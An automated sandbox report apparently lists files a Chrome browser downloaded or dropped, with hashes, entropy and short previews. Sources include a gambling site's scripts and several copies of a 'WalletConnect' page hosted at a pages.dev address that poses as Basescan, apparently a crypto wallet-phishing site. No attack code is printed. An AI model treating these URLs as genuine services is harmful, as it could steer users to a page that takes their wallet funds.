                                                                                                                                                                                                                                              SHA-512:1B33AB5BA8B3771DF706A6CD70D4343DAB7EA263D9E89DC196ABE5192B05D2EA7E96F988EF5F41787F7CE43E4A2393034890169626C8D985A26F0EA81E40B499
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/lottery2/assets/currency-47f1b68e.js
                                                                                                                                                                                                                                              Preview:import{n as s,j as o,l as r}from"./manifest-aca455c4.js";const c=()=>{const{amount2local:t}=r;return(n,e)=>{const a=n?new o(Number(n)):new o(0);return Number(t(a,"USD").toFixed(e||2))}},l=()=>{const{amount2localStr:t}=r;return n=>{const e=n?new o(Number(n)):new o(0);return t(e,"USD")}},i=()=>{const{currencyName:t}=r;return s.getAlias(t)};export{c as a,i as g,l as u};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8348)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):8349
                                                                                                                                                                                                                                              Entropy (8bit):5.292403550625203
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:uVzhXyeV17RhDQrjea0/t6P1LgfK/NnGxsdDLinLbvb:IyeV17X0rjmF6PEK/BGxsRuLv
                                                                                                                                                                                                                                              MD5:55D724A00A5E3BA0D1899DD4EC4D972E
                                                                                                                                                                                                                                              SHA1:9E2EC7F6A5D498A39FDAF96852020B8A72B5CFD2
                                                                                                                                                                                                                                              SHA-256:686CADE04510B4439FC2BE5821C3BA36424143503DDF7EBC7BA23FAF47F154AD
                                                                                                                                                                                                                                              SHA-512:2A031D6A6A592D3612EF84D8FDDD964FC46D9245BB0B21B0A07FF326CB982862AC8D6222AE21F14E727AAF59698BA6001D7B91D22F41F70481CA47FFC94D8104
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{i,e as x,s as g,t as o,c as a,j as P,b as j,m as k}from"./web-13cf6287.js";import{T as h,B as p,h as $,c as R,u as _,A as C,p as S}from"./manifest-51a3674f.js";import{L as Y}from"./index-3fd48be3.js";import{m as F,i as I,c as M,F as w}from"./solid-js-38561dfe.js";import{A as U}from"./animate-number-f0294c10.js";import{C as L}from"./currency-format-1c532f37.js";import{t as c}from"./i18n-fcfac1d2.js";import{R as v}from"./type-bfb25fc4.js";import{e as m}from"./index-96ed660e.js";var T=o('<img class="absolute left-44 top-14 animate-heartbeat animation-duration-1000">'),N=o('<img class="absolute left-24 top-32 animate-heartbeat animation-duration-1000">'),O=o('<img class="absolute left-15 top-24 animate-heartbeat animation-duration-1000">'),A=o('<div class="relative z-0 flex h-60 w-full items-center justify-center"><div class="absolute left-1/2 top-1/2 size-3/4 -translate-x-1/2 -translate-y-1/2 bg-gradient-bonus_wallet"></div><img class="z-0 size-28 animate-wallet animation-duration-
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2103)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):2104
                                                                                                                                                                                                                                              Entropy (8bit):5.349578191920051
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:a8fCksmrHRPAZrxjeFFzcFxE4x6onu+hs5XRV2Y0:FfCp+1ABVouh4eu+hs5BV2Y0
                                                                                                                                                                                                                                              MD5:89F9D220C4128E9B1483885E09D5DBF3
                                                                                                                                                                                                                                              SHA1:3AD859919802F69C8BBC329639DC82634FAE4A05
                                                                                                                                                                                                                                              SHA-256:F0E4DBF6799F9E8DD72EE975B121783D6137E19A997059039D09D6F3BD6FC0C2
                                                                                                                                                                                                                                              SHA-512:4878A4F190DAF6DC701427F2233BCABD603240B1854B4233AA4B210ACC36C3E8D6AB9F096F73C514EF5E7FEEB300267350E80B41D508ED51844562026DA52591
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/common-DVIU4ngr.js
                                                                                                                                                                                                                                              Preview:import{g as i,a$ as z,a as A,a7 as M,b0 as P,$ as m,b1 as w,aa as S}from"./index-DD2Zk4iT.js";var u=(e=>(e.DAILY="daily",e.WEEKLY="weekly",e.MONTHLY="monthly",e))(u||{});const E=()=>i().get("/activity/contest/infos/"),F=e=>i().get(`/activity/contest/${e}/list/`),W=e=>i().get(`/activity/contest/${e}/rank/`).then(t=>({wager:parseFloat(t.wager),rank:Number(t.rank)})),Y=e=>i().get(`/activity/contest/${e}/last/`),s={api_info:E,api_list:F,api_rank:W,api_prev:Y},o=new Date(0),H=z(()=>{const[e,t]=A(u.DAILY),[l,c]=M({contestType:u.DAILY,supportType:[],startTime:o,endTime:o,baseBonus:0,userBonusRate:[],wagerCurrency:"BCD",totalBonusWagerRate:0,participateCurrency:[],prizePoolChangeRate:0,totalWager:0,prizeAmount:0,activeList:[],prevStartTime:o,prevEndTime:o,prevList:[],rank:0,wager:0}),d=P(),[,{refetch:g}]=m(e,async a=>{let[n,R,r]=await Promise.all([s.api_info(),s.api_list(a),s.api_prev(a)]);const B=n.find(p=>p.contestType==a),{startTime:D,endTime:I,baseBonus:f,userBonusRate:L,wagerCurrency:h,to
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2023)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):13346
                                                                                                                                                                                                                                              Entropy (8bit):4.990994193525422
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:fedtvVzZN4SHM/WjIxUBvTHb4fAdcdkGVwG/JZ3y1qY6W:mdtvVzZCSHKWjIaBvjb4fAd8kGVwG/JU
                                                                                                                                                                                                                                              MD5:165976920277A44E712629B3265D713D
                                                                                                                                                                                                                                              SHA1:5A9F4AF1CBC2B0FBB38DD9EBFC64AF8843923D25
                                                                                                                                                                                                                                              SHA-256:2B03169693FA3A6AAE1A41473B8F5A4C258314372970EEAEC9E47E56FDA35AA4
                                                                                                                                                                                                                                              SHA-512:EBF8E229AB680A080C40F0FC190C7A541004918F8BD78FB9714F5B638655BB5464995B6CD04D72B5C296AA34ADB4E01290A5F3693F8F251F3B3BF887BC9EAF77
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:;(function($){'use strict';var MegaMenu=window.MegaMenu||{};MegaMenu=(function(){function MegaMenu(element,options){var self=this;this.$element=$(element);this.options=$.extend(true,{},MegaMenu.defaults,options);this._items=$();Object.defineProperties(this,{itemsSelector:{get:function(){return self.options.classMap.hasSubMenu+','+.self.options.classMap.hasMegaMenu;}},_tempChain:{value:null,writable:true},state:{value:null,writable:true}});this.initialize();}.return MegaMenu;}());MegaMenu.defaults={event:'hover',direction:'horizontal',breakpoint:991,animationIn:false,animationOut:false,rtl:false,hideTimeOut:300,sideBarRatio:1/4,pageContainer:$('body'),classMap:{initialized:'.hs-menu-initialized',mobileState:'.hs-mobile-state',subMenu:'.hs-sub-menu',hasSubMenu:'.hs-has-sub-menu',hasSubMenuActive:'.hs-sub-menu-opened',megaMenu:'.hs-mega-menu',hasMegaMenu:'.hs-has-mega-menu',hasMegaMenuActive:'.hs-mega-menu-opened'},mobileSpeed:400,mobileEasing:'linear',isMenuOpened:false,beforeOpen:functi
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):340
                                                                                                                                                                                                                                              Entropy (8bit):4.990637803415423
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:tnr/nUEVumc4slvtM65t5kyrL6ugFD4pK3aQJRtNgsKDjpn:tr/nTVuXM658Gjgt4pK3aQzHKDjpn
                                                                                                                                                                                                                                              MD5:4068CDE60F5861F58267AAA67AAAF077
                                                                                                                                                                                                                                              SHA1:B75388D28139EE00521C89ED560693C1A0505DBE
                                                                                                                                                                                                                                              SHA-256:0EDB798EBAB1E9AB1C1E563628416CF1A68AF4B3840129F920CF23DC9F61AECC
                                                                                                                                                                                                                                              SHA-512:8E7D247DC0A895CFB60B385598B7C5CC3282039BD33256280603F0492594DA90151FFB73A66D21B85A444160C60AB20797F950EB3BDF674A4AED8F317954AFBE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/images/logo-symbol.svg
                                                                                                                                                                                                                                              Preview:<svg width="128" height="128" viewBox="0 0 128 128" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M128 64C128 99.3462 99.2961 128 63.8883 128C30.2955 128 2.73697 102.208 0 69.3797H84.7409V58.6202H0C2.73697 25.7915 30.2955 0 63.8883 0C99.2961 0 128 28.6537 128 64Z" fill="#0052FF"/>.</svg>.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (640), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):640
                                                                                                                                                                                                                                              Entropy (8bit):4.483941185979088
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:VrckvFrW30s0s0s0s0s0s0s0s1PAQ+bm6SfVVVVVVVVmn:Bck8AQ+y6Sun
                                                                                                                                                                                                                                              MD5:595D5EE1699C038E8CBBB616B5ABA2A1
                                                                                                                                                                                                                                              SHA1:D1E94CB695D7F6D96E4871183327656E3420B51D
                                                                                                                                                                                                                                              SHA-256:0E81F2DFF97C9B88703376FE4B734D89E26D6943B88A5FAA0CD0727AA88D2E8C
                                                                                                                                                                                                                                              SHA-512:7743DC3DBD0312F00B49B06FEB52310E49DE619DBEDB7C74173679EB0011A5052044A906C49C918A4549431191449C93A73AAF3756E86E97C048D71AA4F83FAC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISvwEJ3qCrNHtsYowSBQ0aaYzfEgUNPR9TPBIFDVqx1xASBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNMeUv_hIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIXCWWIXn0AAOPcEgUNGmmM3xIFDT0fUzwSEAlBCdISZwSuWhIFDVqx1xASZAlaBNe_WLhjZBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSTwnjpyY1BVI-LRIFDTHlL_4SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8=?alt=proto
                                                                                                                                                                                                                                              Preview:CuoBCgcNGmmM3xoACgcNPR9TPBoACgcNWrHXEBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNMeUv/hoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoAChIKBw0aaYzfGgAKBw09H1M8GgAKCQoHDVqx1xAaAAp1CgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACloKBw0x5S/+GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgA=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 100x133, components 3
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2699
                                                                                                                                                                                                                                              Entropy (8bit):7.370797375747729
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:Ull06uETAnsq/OBewu8T9n24G1mqFBOkxsfE:U0EKO0Rer6mkyfE
                                                                                                                                                                                                                                              MD5:439CEA73410B36CE52BD12624F1B7198
                                                                                                                                                                                                                                              SHA1:741BDEA782C27D1EDA0F67B833F2DF6EA7EF742C
                                                                                                                                                                                                                                              SHA-256:0D529F879AE5747B898A5AB010F865CBC40C41C493121AC9B2CFA67880E667AD
                                                                                                                                                                                                                                              SHA-512:9CE2E35817A705369A6DB6D539404EEA8F766F27373A10FB65454DB3B4AFAF65B9542BF4197F00580E7620D76E3688D3C9B8F03E19A2791963165B15A25C2C62
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:......JFIF.....H.H......ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0........................................................#...#*%%*525EE\..................................................#...#*%%*525EE\........d.."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B....
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/images/svg/brands/metamask.svg
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):354253
                                                                                                                                                                                                                                              Entropy (8bit):5.452838789022815
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:W/NI0mVIUEkmlURnG5Z645bk6pqPk8iMCAfCStdnpmjnNtd9nDXjhcApwTbLEdex:W/SVKuRn9ZU1V5Un
                                                                                                                                                                                                                                              MD5:ADF9CE8FF3CE8B4BC923C5C9EF2CD9EE
                                                                                                                                                                                                                                              SHA1:57F66D9636FB8991431FCE4AD0251D0A0938FA08
                                                                                                                                                                                                                                              SHA-256:D212730A69D5AC65DD46BC7E32E28DF80B5DE996696E29768979995054CDF4CC
                                                                                                                                                                                                                                              SHA-512:E3752B0EDE173D73C459FF076AF47A6F44A3FAF823F8E27A0CC5604D34E6238DFF2A247DB545A907065A517FBF99631875C3530257EC79CABE6266F5E08294C8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:(function(){function o(n){var i=e;n&&(e[n]||(e[n]={}),i=e[n]);if(!i.define||!i.define.packaged)t.original=i.define,i.define=t,i.define.packaged=!0;if(!i.require||!i.require.packaged)r.original=i.require,i.require=r,i.require.packaged=!0}var ACE_NAMESPACE="",e=function(){return this}();!e&&typeof window!="undefined"&&(e=window);if(!ACE_NAMESPACE&&typeof requirejs!="undefined")return;var t=function(e,n,r){if(typeof e!="string"){t.original?t.original.apply(this,arguments):(console.error("dropping module because define wasn't a string."),console.trace());return}arguments.length==2&&(r=n),t.modules[e]||(t.payloads[e]=r,t.modules[e]=null)};t.modules={},t.payloads={};var n=function(e,t,n){if(typeof t=="string"){var i=s(e,t);if(i!=undefined)return n&&n(),i}else if(Object.prototype.toString.call(t)==="[object Array]"){var o=[];for(var u=0,a=t.length;u<a;++u){var f=s(e,t[u]);if(f==undefined&&r.original)return;o.push(f)}return n&&n.apply(null,o)||!0}},r=function(e,t){var i=n("",e,t);return i==und
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (50697)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):69922
                                                                                                                                                                                                                                              Entropy (8bit):5.335878099877619
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:9L7WOhmzL8s/m144wKxfMoSSfv0Yae9LYlpEogGp1Tz9mMOe8:9f9mzosPjKaQAQGDzVT8
                                                                                                                                                                                                                                              MD5:A2FC4B55ABA9142769FAFBC4D8E1B5C5
                                                                                                                                                                                                                                              SHA1:C27D2E10A1D75B6C6D73FE8D20EDB4EE66E11474
                                                                                                                                                                                                                                              SHA-256:D4A0756571B5460E1303636D818FC50A69B5960E25C5D49E253C9AA4E19F2B9C
                                                                                                                                                                                                                                              SHA-512:5429493293AAF2D983B7F33C91E2808E5D183CBC1A47E5B2669EBBFB7D2A990EB8A6CC1712C356DF5BFC4F55466312C1F2FDA07D3FFBE8A2A986DA3D7F7F6A8B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/index-3fd48be3.js
                                                                                                                                                                                                                                              Preview:function mt(f){if(f===void 0)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return f}function Ei(f,t){f.prototype=Object.create(t.prototype),f.prototype.constructor=f,f.__proto__=t}/*!. * GSAP 3.12.5. * https://gsap.com. *. * @license Copyright 2008-2024, GreenSock. All rights reserved.. * Subject to the terms at https://gsap.com/standard-license or for. * Club GSAP members, the agreement issued with that membership.. * @author: Jack Doyle, jack@greensock.com.*/var rt={autoSleep:120,force3D:"auto",nullTargetWarn:1,units:{lineHeight:""}},$t={duration:.5,overwrite:!1,delay:0},Je,W,E,at=1e8,A=1/at,Be=Math.PI*2,Rr=Be/4,Er=0,zi=Math.sqrt,zr=Math.cos,Fr=Math.sin,X=function(t){return typeof t=="string"},L=function(t){return typeof t=="function"},yt=function(t){return typeof t=="number"},ti=function(t){return typeof t=="undefined"},dt=function(t){return typeof t=="object"},Q=function(t){return t!==!1},ei=function(){return typeof window!="undefined"},pe=fu
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65533), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):704321
                                                                                                                                                                                                                                              Entropy (8bit):5.431939160707167
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:v3Wh7Yfg9gOSfsRUz2g14LseUszBWeGGY/HwF4cV++ZXBRHITDS0XtQvoH6vNyNX:pfs+z2Wo17qPEltzH0tQVA33Kskzc
                                                                                                                                                                                                                                              MD5:EE359F878C71CF7EC79DD220824C8710
                                                                                                                                                                                                                                              SHA1:EC1637C150AFDBE4B77A93357EE84D8DCF583333
                                                                                                                                                                                                                                              SHA-256:6936A0051F6C21CB3E560F4628619A80B6C6DCF16C0AEEDF45D14B8A4B323EB5
                                                                                                                                                                                                                                              SHA-512:9160DB38FEDFBF3FDECEAE1D9371C7A7E1102B86E0C96BA87203BF0B5D1094FFB4EEB557C8582F6A42F083AA1DDF05AC002ABAE2585C9A631FE74C545E30D3F7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://newassets.hcaptcha.com/c/c2e3bd8c1a9aac93490fb6f6645657b5466b5b928b1bcf2109a7a9e1f21e35be/hsw.js
                                                                                                                                                                                                                                              Preview:var hsw=function vRZR(){"use strict";function A(A,Q,B){return Q<=A&&A<=B}function Q(A){if(void 0===A)return{};if(A===Object(A))return A;throw TypeError("Could not convert argument to dictionary")}var B=function(A){return A>=0&&A<=127},E=-1;function I(A){this.tokens=[].slice.call(A),this.tokens.reverse()}I.prototype={endOfStream:function(){return!this.tokens.length},read:function(){return this.tokens.length?this.tokens.pop():E},prepend:function(A){if(Array.isArray(A))for(var Q=A;Q.length;)this.tokens.push(Q.pop());else this.tokens.push(A)},push:function(A){if(Array.isArray(A))for(var Q=A;Q.length;)this.tokens.unshift(Q.shift());else this.tokens.unshift(A)}};var C=-1;function g(A,Q){if(A)throw TypeError("Decoder error");return Q||65533}function D(A){return A=String(A).trim().toLowerCase(),Object.prototype.hasOwnProperty.call(w,A)?w[A]:null}var w={};[{encodings:[{labels:["unicode-1-1-utf-8","utf-8","utf8"],name:"UTF-8"}],heading:"The Encoding"}].forEach((function(A){A.encodings.forEach((f
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 388 x 247, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):29316
                                                                                                                                                                                                                                              Entropy (8bit):7.905658342132076
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:LY1j/QsLS9Z0KxFUTOq0ISmYyiF6GGRr/NncmWb/:2jpLm0KxKTOR/B6GIFcL
                                                                                                                                                                                                                                              MD5:B449FA7D10AEE49DEC924F63B612524F
                                                                                                                                                                                                                                              SHA1:2F34AD63015D52095B5807CA5828D0CE83BBC4EF
                                                                                                                                                                                                                                              SHA-256:CB12F6CC8B222C32DCF513E545F4C6F9AA150AF47EB1691CF42359680E82C29D
                                                                                                                                                                                                                                              SHA-512:6CDE38958554E714003E06F1F6C139BDD766D5FBD049B452B151A87E405704FEB3E420CBCBFA07B9C292D602A9D79896179A361B4031C3808AC669482AF8ECF2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
